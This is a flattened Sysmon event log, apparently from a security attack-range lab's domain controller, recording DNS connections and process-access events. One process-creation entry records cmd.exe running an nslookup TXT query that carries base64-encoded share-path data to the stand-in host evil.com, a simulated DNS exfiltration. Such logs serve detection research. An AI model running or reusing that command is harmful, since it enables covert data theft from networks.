354300x8000000000000000214940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.405{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51226- 354300x8000000000000000214939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.405{00000000-0000-0000-0000-000000000000}2812<unknown process>-udptruefalse127.0.0.1-51226-false127.0.0.1-53domain 354300x8000000000000000214938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.335{00000000-0000-0000-0000-000000000000}7688<unknown process>-udpfalsefalse127.0.0.1-51225-false127.0.0.1-53domain 354300x8000000000000000214937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.335{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51225- 354300x8000000000000000214936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.335{00000000-0000-0000-0000-000000000000}7688<unknown process>-udptruefalse127.0.0.1-51225-false127.0.0.1-53domain 354300x8000000000000000214935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.335{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51224- 354300x8000000000000000214934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.335{00000000-0000-0000-0000-000000000000}7688<unknown process>-udptruefalse127.0.0.1-51224-false127.0.0.1-53domain 354300x8000000000000000214933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.334{00000000-0000-0000-0000-000000000000}7688<unknown process>-udpfalsefalse127.0.0.1-51223-false127.0.0.1-53domain 354300x8000000000000000214932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.334{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51223- 354300x8000000000000000214931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.334{00000000-0000-0000-0000-000000000000}7688<unknown process>-udptruefalse127.0.0.1-51223-false127.0.0.1-53domain 354300x8000000000000000214930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.260{00000000-0000-0000-0000-000000000000}7388<unknown process>-udpfalsefalse127.0.0.1-51222-false127.0.0.1-53domain 354300x8000000000000000214929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.260{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51222- 354300x8000000000000000214928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.260{00000000-0000-0000-0000-000000000000}7388<unknown process>-udptruefalse127.0.0.1-51222-false127.0.0.1-53domain 354300x8000000000000000214927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.260{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51221- 354300x8000000000000000214926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.260{00000000-0000-0000-0000-000000000000}7388<unknown process>-udptruefalse127.0.0.1-51221-false127.0.0.1-53domain 354300x8000000000000000214925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.259{00000000-0000-0000-0000-000000000000}7388<unknown process>-udpfalsefalse127.0.0.1-51220-false127.0.0.1-53domain 354300x8000000000000000214924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.259{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51220- 354300x8000000000000000214923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.259{00000000-0000-0000-0000-000000000000}7388<unknown process>-udptruefalse127.0.0.1-51220-false127.0.0.1-53domain 354300x8000000000000000214922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.196{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51219- 354300x8000000000000000214921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.196{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-51219-false127.0.0.1-53domain 354300x8000000000000000214920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.196{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-51218-false127.0.0.1-53domain 354300x8000000000000000214919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.196{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51218- 354300x8000000000000000214918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.196{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-51218-false127.0.0.1-53domain 354300x8000000000000000214917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.195{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-51217-false127.0.0.1-53domain 354300x8000000000000000214916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.195{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51217- 354300x8000000000000000214915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.195{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-51217-false127.0.0.1-53domain 354300x8000000000000000214914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.133{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51216- 354300x8000000000000000214913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.060{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51215-false127.0.0.1-53domain 354300x8000000000000000214912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.060{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51215- 354300x8000000000000000214911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.060{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51215-false127.0.0.1-53domain 354300x8000000000000000214910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.060{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51214-false127.0.0.1-53domain 354300x8000000000000000214909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.060{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51214- 354300x8000000000000000214908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.060{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51214-false127.0.0.1-53domain 354300x8000000000000000214907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.060{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51213-false127.0.0.1-53domain 354300x8000000000000000214906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.060{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51213- 354300x8000000000000000214905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.060{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51213-false127.0.0.1-53domain 354300x8000000000000000214904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.972{00000000-0000-0000-0000-000000000000}7608<unknown process>-udpfalsefalse127.0.0.1-51212-false127.0.0.1-53domain 354300x8000000000000000214903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.972{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51212- 354300x8000000000000000214902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.972{00000000-0000-0000-0000-000000000000}7608<unknown process>-udptruefalse127.0.0.1-51212-false127.0.0.1-53domain 354300x8000000000000000214901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.972{00000000-0000-0000-0000-000000000000}7608<unknown process>-udpfalsefalse127.0.0.1-51211-false127.0.0.1-53domain 354300x8000000000000000214900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.972{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51211- 354300x8000000000000000214899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.972{00000000-0000-0000-0000-000000000000}7608<unknown process>-udptruefalse127.0.0.1-51211-false127.0.0.1-53domain 354300x8000000000000000214898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.971{00000000-0000-0000-0000-000000000000}7608<unknown process>-udpfalsefalse127.0.0.1-51210-false127.0.0.1-53domain 354300x8000000000000000214897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.971{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51210- 354300x8000000000000000214896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.971{00000000-0000-0000-0000-000000000000}7608<unknown process>-udptruefalse127.0.0.1-51210-false127.0.0.1-53domain 354300x8000000000000000214895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.857{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51209- 354300x8000000000000000214894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.856{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51208- 10341000x8000000000000000214893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.319{2E1864BB-18FD-629A-1646-000000005F02}60725228C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-1746-000000005F02}2568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.319{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1746-000000005F02}2568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.319{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.319{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.319{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.319{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.319{2E1864BB-18FD-629A-1546-000000005F02}4004216C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-1746-000000005F02}2568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.323{2E1864BB-18FD-629A-1746-000000005F02}2568C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-1546-000000005F02}4004C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfqyfzs.tmp 2>&1 10341000x8000000000000000214885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.282{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1646-000000005F02}6072C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.282{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1646-000000005F02}6072C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.267{2E1864BB-18FD-629A-1646-000000005F02}60725228C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-1546-000000005F02}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.267{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1646-000000005F02}6072C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.251{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.251{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.251{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.251{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.251{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1546-000000005F02}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 